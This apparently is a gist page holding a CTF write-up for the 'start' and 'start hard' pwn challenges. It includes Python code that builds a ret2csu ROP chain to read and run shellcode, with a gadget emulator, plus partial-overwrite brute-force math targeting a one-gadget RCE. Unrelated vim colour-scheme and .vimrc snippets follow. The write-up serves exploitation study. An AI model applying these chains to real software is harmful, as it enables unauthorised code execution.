Paul PaulCher
asis_ctf_writeup.md

start

By using the so-called universal gadget from __libc_csu_init we can call read() to load shellcode into the rwx memory segment and then return into it.
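The chain described above, as an added example that is not part of the original writeup: it builds the ret2csu chain that calls read(0, rwx, len) through the two __libc_csu_init gadgets and then returns into the buffer, and it includes a small emulator of those two gadgets so the chain can be checked offline. The gadget, GOT and rwx addresses are placeholders assumed for illustration (the real ones come from disassembling the challenge binary), and the gadget layout assumed is the older one (`mov rdx, r13; mov rsi, r14; mov edi, r15d`); newer glibc versions swap the roles of r13 and r15.

```python
import struct

# Placeholder addresses, assumed for illustration only; they are not taken
# from the writeup. Real values come from the challenge binary.
CSU_POP = 0x40069A    # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
CSU_CALL = 0x400680   # mov rdx,r13; mov rsi,r14; mov edi,r15d; call [r12+rbx*8]
READ_GOT = 0x601018   # GOT slot holding the resolved address of read()
RWX_ADDR = 0x601100   # start of the rwx segment the shellcode is read into
SHELLCODE_LEN = 0x100


def p64(v):
    return struct.pack("<Q", v & 0xFFFFFFFFFFFFFFFF)


def build_ret2csu_chain(func_got, rdi, rsi, rdx, ret_to):
    """ROP chain calling [func_got](rdi, rsi, rdx) via the csu gadgets,
    then returning to ret_to."""
    chain = p64(CSU_POP)
    chain += p64(0)          # rbx = 0: call [r12 + 0*8] == call [r12]
    chain += p64(1)          # rbp = 1: after add rbx,1 the cmp exits the loop
    chain += p64(func_got)   # r12: address of the function pointer to call
    chain += p64(rdx)        # r13 -> rdx (third argument)
    chain += p64(rsi)        # r14 -> rsi (second argument)
    chain += p64(rdi)        # r15 -> edi (first argument, 32-bit)
    chain += p64(CSU_CALL)
    chain += p64(0)          # consumed by add rsp, 8 after the loop
    chain += p64(0) * 6      # second pop rbx..r15, values unused
    chain += p64(ret_to)     # final ret
    return chain


def read_shellcode_chain():
    # read(0, RWX_ADDR, SHELLCODE_LEN), then jump into the freshly read bytes
    return build_ret2csu_chain(READ_GOT, 0, RWX_ADDR, SHELLCODE_LEN, RWX_ADDR)


def simulate(chain, memory):
    """Tiny emulator of the two csu gadgets. Walks the chain as if it were
    the stack and records (callee, rdi, rsi, rdx) for each call made, with
    the callee assumed to return normally. `memory` maps addresses to the
    8-byte values stored there (e.g. GOT slots). Returns (calls, final pc)."""
    stack = [struct.unpack("<Q", chain[i:i + 8])[0]
             for i in range(0, len(chain), 8)]
    regs = {}
    sp = 0

    def pop():
        nonlocal sp
        v = stack[sp]
        sp += 1
        return v

    calls = []
    pc = pop()
    while True:
        if pc == CSU_POP:
            for r in ("rbx", "rbp", "r12", "r13", "r14", "r15"):
                regs[r] = pop()
            pc = pop()                                   # ret
        elif pc == CSU_CALL:
            while True:                                  # call loop
                callee = memory[regs["r12"] + regs["rbx"] * 8]
                calls.append((callee, regs["r15"] & 0xFFFFFFFF,
                              regs["r14"], regs["r13"]))
                regs["rbx"] += 1
                if regs["rbx"] == regs["rbp"]:
                    break
            pop()                                        # add rsp, 8
            for r in ("rbx", "rbp", "r12", "r13", "r14", "r15"):
                regs[r] = pop()
            pc = pop()                                   # ret
        else:
            return calls, pc


if __name__ == "__main__":
    # constructed libc address for read(), stands in for the real GOT value
    calls, final_pc = simulate(read_shellcode_chain(), {READ_GOT: 0x7FFFF7B04250})
    print(calls, hex(final_pc))
```

The emulator is what makes the chain checkable before sending it: a wrong rbp, for example, keeps the gadget looping and shows up as an extra call or a lookup outside the GOT instead of a silent crash on the target.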

start hard

By calling read() we can overwrite only the last two bytes of the stored read pointer, redirecting it to something useful despite ASLR. Fortunately, this version of libc has a one-gadget RCE at 0xf0567, right next to read (0xf6670), so the two addresses differ only in their low two bytes. The low 12 bits of a libc address are a page offset that ASLR does not randomize, so of the 16 bits we overwrite only 4 are unknown: each attempt succeeds with probability 1/16, and around 16 attempts are needed on average.
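The partial overwrite above, as an added example that is not part of the original writeup: it computes the two bytes to write for a guessed value of the unknown nibble, checks the result against every possible libc base, and shows why some guesses can never work. The offsets 0xf6670 and 0xf0567 are the ones quoted in the writeup; the libc base used for the simulation is constructed, and it is assumed that the overwritten pointer is read's GOT entry and that the libc base is page aligned.

```python
import struct

READ_OFF = 0xF6670        # offset of read() in the challenge libc (from the writeup)
ONE_GADGET_OFF = 0xF0567  # one-gadget RCE offset in the same libc (from the writeup)


def partial_overwrite(read_off, gadget_off, base_nibble_guess):
    """Two bytes to write over the low half of the pointer to read(),
    assuming bits 12-15 of the libc base equal base_nibble_guess.
    Bits 0-11 of a libc address are a page offset that ASLR leaves
    alone, so that nibble is the only unknown in the low 16 bits."""
    low16 = ((base_nibble_guess << 12) + gadget_off) & 0xFFFF
    return struct.pack("<H", low16)


def overwrite_result(libc_base, read_off, payload):
    """Pointer value after the low two bytes of read's address are replaced."""
    ptr = libc_base + read_off
    return (ptr & ~0xFFFF) | struct.unpack("<H", payload)[0]


def attempt_succeeds(libc_base, read_off, gadget_off, guess):
    payload = partial_overwrite(read_off, gadget_off, guess)
    return overwrite_result(libc_base, read_off, payload) == libc_base + gadget_off


def bruteforce_stats(read_off, gadget_off, guess, base_hi=0x7FFFF7A00000):
    """Try one fixed guess against all 16 values of the random nibble.
    Returns (successes, trials); successes/trials is the per-attempt hit
    rate. base_hi is a constructed, page-aligned base with bits 12-15 clear."""
    hits = 0
    for nibble in range(16):
        base = base_hi | (nibble << 12)
        hits += attempt_succeeds(base, read_off, gadget_off, guess)
    return hits, 16


def feasible_guesses(read_off, gadget_off):
    """Nibble values for which a correct guess actually lands on the gadget.
    For the others, adding the offset carries into bit 16 for read but not
    for the gadget, and a two-byte write can never repair the upper bytes."""
    return [g for g in range(16)
            if bruteforce_stats(read_off, gadget_off, g)[0] == 1]


if __name__ == "__main__":
    print(partial_overwrite(READ_OFF, ONE_GADGET_OFF, 3).hex())
    print(bruteforce_stats(READ_OFF, ONE_GADGET_OFF, 3))
    print(feasible_guesses(READ_OFF, ONE_GADGET_OFF))
```

Against a target that re-randomizes on every connection, any feasible guess hits with probability 1/16 per try, which is where the writeup's figure of about 16 attempts comes from; a guess of 0xa or above never hits here because 0xf6670 carries into the third byte for those bases while 0xf0567 does not.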

EDIT: check out another great solution proposed by agadeint in the comment section below, which is cleaner and requires neither brute-forcing nor a one-gadget.

twilight.vim
" twilight256 color scheme file
" Maintainer: Neal Milstein - neal dot milstein at gmail dot com
" Last Change: 2011 Feb 1
"
" This theme copies the colors from the TextMate theme Twilight.
"
" The theme is designed to be used on a black background. I only tested it
" using a 256-color terminal; I do not think it will work on much else (gvim,
" 8-color terminal, etc.).
"
.vimrc
" Disable the error bell
set noeb
" Show line numbers
set nu
" Use Vim settings, rather than Vi settings (much better!).
set nocompatible
" Turn on the verboseness to see everything vim is doing.
"set verbose=9